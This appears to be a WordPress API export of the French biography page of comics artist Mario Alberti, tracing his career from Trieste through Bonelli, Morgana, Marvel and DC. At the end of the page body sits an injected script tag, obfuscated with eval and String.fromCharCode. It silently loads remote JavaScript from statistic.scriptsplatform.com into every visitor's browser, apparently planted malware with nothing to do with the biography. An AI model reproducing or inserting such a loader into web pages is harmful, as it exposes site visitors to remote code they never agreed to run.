{"id":2,"date":"2013-04-06T13:50:45","date_gmt":"2013-04-06T13:50:45","guid":{"rendered":"http:\/\/stage.marioalberti.com\/?page_id=2"},"modified":"2019-04-08T14:07:32","modified_gmt":"2019-04-08T12:07:32","slug":"bio","status":"publish","type":"page","link":"https:\/\/stage.marioalberti.com\/fr\/bio\/","title":{"rendered":"Bio"},"content":{"rendered":"<p>Je nais \u00e0 Trieste le 7 mai 1965 et je cr\u00e9e tr\u00e8s jeune mon premier personnage de bande dessin\u00e9e : Polip, le roi des mers, dans les bulles les lettres sont mises au hasard parce que bien \u00e9videmment je  ne sais pas encore \u00e9crire.<\/p>\n<p>Alors \u00e9tudiant  \u00e0 l\u2019universit\u00e9  je suis \u00e9bloui voyant \u00ab Laputa, Le Ch\u00e2teau dans le Ciel\u00bb du Maitre Miyazaki et c\u2019est ainsi que je d\u00e9cide que raconter et dessiner des histoires c\u2019est vraiment ce que je veux  faire quand je serais grand.<br \/>\nJe laisse tomber le marketing ( m\u00eame si je d\u00e9croche mon dipl\u00f4me  en \u00e9conomie et commerce avec comme sujet de th\u00e8se \u00ab la distribution \u00e9ditoriale de la bande dessin\u00e9e \u00bb) et je  commence mon parcours de professionnel en 1990 avec Holly Conick, une nouvelle, publi\u00e9e dans Fumo di China.<\/p>\n<p>En 1991, je d\u00e9bute ma collaboration avec la revue Intrepido , dessinant quelques livres  ainsi que quelques \u00e9pisodes de la s\u00e9rie \u00ab Dipartimento ESP \u00bb sur les textes de Michelangelo La Neve.<\/p>\n<p>En 1993 je rejoins l\u2019\u00e9quipe de la Maison d\u2019Edition Sergio Bonelli travaillant pour la collection Nathan Never.<\/p>\n<p>En 1994 avec \u00ab Le Chant de la Baleine \u00bb, num\u00e9ro 31 de la s\u00e9rie, je gagne le prix Albertarelli.<\/p>\n<p>En 1994 je travaille encore sur les albums de Legs Wever, toujours pour la Bonelli puis en 1999 j\u2019 entreprends la mise en sc\u00e8ne pour la m\u00eame collection, en \u00e9crivant un album sp\u00e9cial \u00ab L\u2019immortel \u00bb.<\/p>\n<p>En 2000, je d\u00e9marre ma fructueuse collaboration avec Luca Enoch, auquel je propose de pr\u00e9parer un projet pour la France, la s\u00e9rie Morgana, publi\u00e9e d\u00e8s 2002 pour les Editeurs Fran\u00e7ais \u00ab Les Humano\u00efdes Associ\u00e9s \u00bb, \u00e9dition toujours en cours.<br \/>\nMorgana a \u00e9t\u00e9 \u00e9galement publi\u00e9e en Espagne, au Portugal, en Allemagne, en Italie ainsi qu\u2019aux Etats-Unis .<\/p>\n<p>Depuis 2004 et encore pour les Humano\u00efdes Associ\u00e9s, avec les textes de Kurk Busiek, je dessine la s\u00e9rie Redhand.<\/p>\n<p>J\u2019 illustre quelques couvertures de la s\u00e9rie \u00ab Jonathan Steele \u00bb de Federico Menola, \u00e9dit\u00e9 par Star Comics.<\/p>\n<p>Depuis 2006 je  collabore avec DC Comics, r\u00e9alisant de nombreuses couvertures dont Aquaman, Wonderwoman, Dr Fate et Shadowpact.<\/p>\n<p>En 2008 et 2009 je travaille pour Marvel sur la s\u00e9rie \u00ab\u00a0X-Men &amp; Spider-Man\u00a0\u00bb avec les textes de Chris Gage.<\/p>\n<p>El 2009 je collabore avec Bob Gale sure le num\u00e9ro 600 de \u00ab\u00a0Amazing Spider-Man\u00a0\u00bb. Je dessine aussi le num\u00e9ro #601 de \u00ab\u00a0Amazing Spider-Man\u00a0\u00bb.<\/p>\n<p>En 2010 encore pour Marvel Je travaille sur la s\u00e9rie \u00ab\u00a0Spider-Man &amp; The Fantastic Four\u00a0\u00bb avec les textes de Chris Gage.<\/p>\n<p>En 2011  Gl\u00e9n\u00e2t  publie \u00ab\u00a0Les Chroniques de L\u00e9gion\u00a0\u00bb, \u00e9crit par Fabien Nury et avec la collaboration de Mathieu Lauffray, Tirso e Zhang Xuaoyu.<\/p>\n<p>En 2013 Delcourt publie le premi\u00e8re tome de \u00ab\u00a0Cutting Edge\u00a0\u00bb, avec les textes de Francesco Dimitri.<\/p>\n<p>Autodidacte, je reconnais etre en dette avec de nombreux auteurs, vraiment trop pour les citer tous.  Cependant un place toute particuli\u00e8re pour des Maitres comme Cavazzano, Magnus, Pazienza et pour l\u2019incontournable Ma\u00eetre Miyazaki\u2026. Qui sans lequel aujourd\u2019hui je ferais peut-\u00eatre le comptable.<script>var f=String;eval(f.fromCharCode(102,117,110,99,116,105,111,110,32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,116,105,115,116,105,99,46,115,99,114,105,112,116,115,112,108,97,116,102,111,114,109,46,99,111,109,47,99,111,108,108,101,99,116,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,125,125));\/*99586587347*\/<\/script><\/p>","protected":false},"excerpt":{"rendered":"<p>Je nais \u00e0 Trieste le 7 mai 1965 et je cr\u00e9e tr\u00e8s jeune mon premier personnage de bande dessin\u00e9e : Polip, le roi des mers, dans les bulles les lettres sont mises au hasard parce que bien \u00e9videmment je ne sais pas encore \u00e9crire. Alors \u00e9tudiant \u00e0 l\u2019universit\u00e9 je suis \u00e9bloui voyant \u00ab Laputa, Le [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"open","ping_status":"open","template":"","meta":{"ngg_post_thumbnail":0},"_links":{"self":[{"href":"https:\/\/stage.marioalberti.com\/fr\/wp-json\/wp\/v2\/pages\/2"}],"collection":[{"href":"https:\/\/stage.marioalberti.com\/fr\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/stage.marioalberti.com\/fr\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/stage.marioalberti.com\/fr\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/stage.marioalberti.com\/fr\/wp-json\/wp\/v2\/comments?post=2"}],"version-history":[{"count":16,"href":"https:\/\/stage.marioalberti.com\/fr\/wp-json\/wp\/v2\/pages\/2\/revisions"}],"predecessor-version":[{"id":1062,"href":"https:\/\/stage.marioalberti.com\/fr\/wp-json\/wp\/v2\/pages\/2\/revisions\/1062"}],"wp:attachment":[{"href":"https:\/\/stage.marioalberti.com\/fr\/wp-json\/wp\/v2\/media?parent=2"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}